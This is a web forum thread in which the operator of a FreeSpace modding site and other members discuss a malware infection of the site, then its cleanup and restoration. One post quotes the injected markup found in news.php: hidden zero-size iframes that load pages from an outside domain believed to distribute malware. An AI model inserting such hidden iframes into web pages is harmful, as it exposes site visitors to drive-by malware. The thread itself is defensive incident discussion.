Author Topic: Freespacemods.net  (Read 47252 times)

0 Members and 2 Guests are viewing this topic.

Offline achtung

  • Friendly Neighborhood Mirror Guy
  • 210
  • ****in' Ace
    • Freespacemods.net
Hey folks, thought it might be a good idea to chime in and let everyone know what's going on.

My host recently decided to move my sites to another server on a whim.  The old servers were 32-bit, the new ones are 64-bit, and are running a different version of PHP.  This move broke all of my sites that used a modified php.ini horribly, and I had to go fix them all.  Somewhere in this mess, somebody managed to upload two .html files that redirected to reycross, which I assume is a malware distribution site.  One was uploaded as an avatar, and another as an upload into the public uploads section.

I have removed the offending files and requested a review of the site from Google.  Hopefully this will fix the issue Firefox and Chrome users are having.  I also plan to look into how exactly the files got there, and from where.

In a day or two it should be fine again.

Sorry.  =/
FreeSpaceMods.net | FatHax | ??????
In the wise words of Charles de Gaulle, "China is a big country, inhabited by many Chinese."

Formerly known as Swantz

 
So that means I don't have to write about the virus that keeps me from entering the site (antivirus blocks the connection).

Not the best way to resume work on TotT after the summer break...
'Teeth of the Tiger' - campaign in the making
Story, Ships, Weapons, Project Leader.

 

Offline Herra Tohtori

  • The Academic
  • 211
  • Bad command or file name
Oh well, google is innocent after all... However, immediately after the google ad javascript, there's the following entry in news.php:

Code: [Select]
<iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe></td></tr></table><table style='width:100%' cellspacing='3'><tr><td style='width:20%;'></td><td style='width:60%;'><img src='/e107_themes/e107v4a/images/blank.gif' width='1' height='1' alt='' /></td><td style='width:20%;'></td></tr><tr><td style='width:20%; vertical-align: top;'>

Which I believe is what is initiating the virus intrusion attempts. It's still in the page source, so as things are Google will keep detecting the site as a malware site; removing all references to reycross.com recursively from all pages on the site should do the trick.
There are three things that last forever: Abort, Retry, Fail - and the greatest of these is Fail.

 

Offline blowfish

  • 211
  • Join the cult of KILL MY ROUTER!!!!!!!!!!1
Funny ... there was a similar malware insertion (hidden frame) in the Earth Defense website, which somehow kept reappearing, a while ago.  It went away after I changed the infrastructure of the page but how it got there in the first place, and why it kept reappearing, both remain a mystery.

 
...but how it got there in the first place, and why it kept reappearing, both remain a mystery.



'Teeth of the Tiger' - campaign in the making
Story, Ships, Weapons, Project Leader.

 

Offline achtung

  • Friendly Neighborhood Mirror Guy
  • 210
  • ****in' Ace
    • Freespacemods.net
It's starting to look like it may be more work than it's worth to clean up fully.

Does anyone here hate Joomla?
FreeSpaceMods.net | FatHax | ??????
In the wise words of Charles de Gaulle, "China is a big country, inhabited by many Chinese."

Formerly known as Swantz

 
It's starting to look like it may be more work than it's worth to clean up fully.

You have a backup or something to revert to?

 

Offline achtung

  • Friendly Neighborhood Mirror Guy
  • 210
  • ****in' Ace
    • Freespacemods.net
It's starting to look like it may be more work than it's worth to clean up fully.

You have a backup or something to revert to?

All downloads and screenshots are backed up on my machine and my host's server.  All I need to do, if I choose to keep e107, is backup the MySQL database, reinstall e107, and then put everything in place like it never happened.  That's how simple it *SHOULD* be.  I'm a strong believer in Murphy's Law though.
FreeSpaceMods.net | FatHax | ??????
In the wise words of Charles de Gaulle, "China is a big country, inhabited by many Chinese."

Formerly known as Swantz

 
So the forums and threads aren't backed up?
'Teeth of the Tiger' - campaign in the making
Story, Ships, Weapons, Project Leader.

 

Offline achtung

  • Friendly Neighborhood Mirror Guy
  • 210
  • ****in' Ace
    • Freespacemods.net
So the forums and threads aren't backed up?

They are.

I probably should have mentioned that. :)
FreeSpaceMods.net | FatHax | ??????
In the wise words of Charles de Gaulle, "China is a big country, inhabited by many Chinese."

Formerly known as Swantz

 

Offline sigtau

  • 29
  • unfortunate technical art assclown
Luckily the subdomains to fsmods didn't get hit. :/
Who uses forum signatures anymore?

 

Offline Fury

  • The Curmudgeon
  • 213
Does anyone here hate Joomla?
Joomla has terrible security history. Granted, most problems are caused by 3rd party addons/plugins rather than the core package. But still.

 
So the forums and threads aren't backed up?

They are.

I probably should have mentioned that. :)

Good. It would take me weeks to recall and rewrite the storyline for TotT.

However as soon as the forum's up I'll save the storyline thread on my HDD to have a backup.
'Teeth of the Tiger' - campaign in the making
Story, Ships, Weapons, Project Leader.

 

Offline achtung

  • Friendly Neighborhood Mirror Guy
  • 210
  • ****in' Ace
    • Freespacemods.net
Main site and files restored.  Forums restored.  User registration disabled.  File upload disabled.  Screenshots for downloads are backed up, but not restored.

This is temporary.  There will be a replacement coming soon.
FreeSpaceMods.net | FatHax | ??????
In the wise words of Charles de Gaulle, "China is a big country, inhabited by many Chinese."

Formerly known as Swantz

 

Offline chief1983

  • Still lacks a custom title
  • 212
  • ⬇️⬆️⬅️⬅️🅰➡️⬇️
    • Skype
    • Steam
    • Twitter
    • Fate of the Galaxy
Glad it's back in some level of operation.
Fate of the Galaxy - Now Hiring!  Apply within | Diaspora | SCP Home | Collada Importer for PCS2
Karajorma's 'How to report bugs' | Mantis
#freespace | #scp-swc | #diaspora | #SCP | #hard-light on EsperNet

"You may not sell or otherwise commercially exploit the source or things you created based on the source." -- Excerpt from FSO license, for reference

Nuclear1:  Jesus Christ zack you're a little too hamyurger for HLP right now...
iamzack:  i dont have hamynerge i just want ptatoc hips D:
redsniper:  Platonic hips?!
iamzack:  lays

 

Offline TopAce

  • Stalwart contributor
  • 212
  • FREDder, FSWiki editor, and tester
I still can't download anything.
* TopAce is waiting patiently.
My community contributions - Get my campaigns from here.

I already announced my retirement twice, yet here I am. If I bring up that topic again, don't believe a word.

 

Offline achtung

  • Friendly Neighborhood Mirror Guy
  • 210
  • ****in' Ace
    • Freespacemods.net
Sorry, that's been fixed.  Everything was extracted to the wrong directory.
FreeSpaceMods.net | FatHax | ??????
In the wise words of Charles de Gaulle, "China is a big country, inhabited by many Chinese."

Formerly known as Swantz

 

Offline TopAce

  • Stalwart contributor
  • 212
  • FREDder, FSWiki editor, and tester
What's up with the uploading business? I cannot see an "upload" button anywhere (except the upload large file one which returns a 404 message), but I see that the 158th have uploaded Exposition.
My community contributions - Get my campaigns from here.

I already announced my retirement twice, yet here I am. If I bring up that topic again, don't believe a word.

 

Offline FUBAR-BDHR

  • Self-Propelled Trouble Magnet
  • 212
  • Master Drunk
    • 165th Beer Drinking Hell Raisers
Main site and files restored.  Forums restored.  User registration disabled.  File upload disabled.  Screenshots for downloads are backed up, but not restored.

This is temporary.  There will be a replacement coming soon.

That would be my guess.
No-one ever listens to Zathras. Quite mad, they say. It is good that Zathras does not mind. He's even grown to like it. Oh yes. -Zathras

 

Offline achtung

  • Friendly Neighborhood Mirror Guy
  • 210
  • ****in' Ace
    • Freespacemods.net
What's up with the uploading business? I cannot see an "upload" button anywhere (except the upload large file one which returns a 404 message), but I see that the 158th have uploaded Exposition.

If you need something uploaded just shoot me a link and I'll gladly add it.  I'm just trying to avoid too many things being added, as I'm not finding any good solutions for transferring the old database of downloads to a new CMS.  I may have to do it all by hand.   :ick:
FreeSpaceMods.net | FatHax | ??????
In the wise words of Charles de Gaulle, "China is a big country, inhabited by many Chinese."

Formerly known as Swantz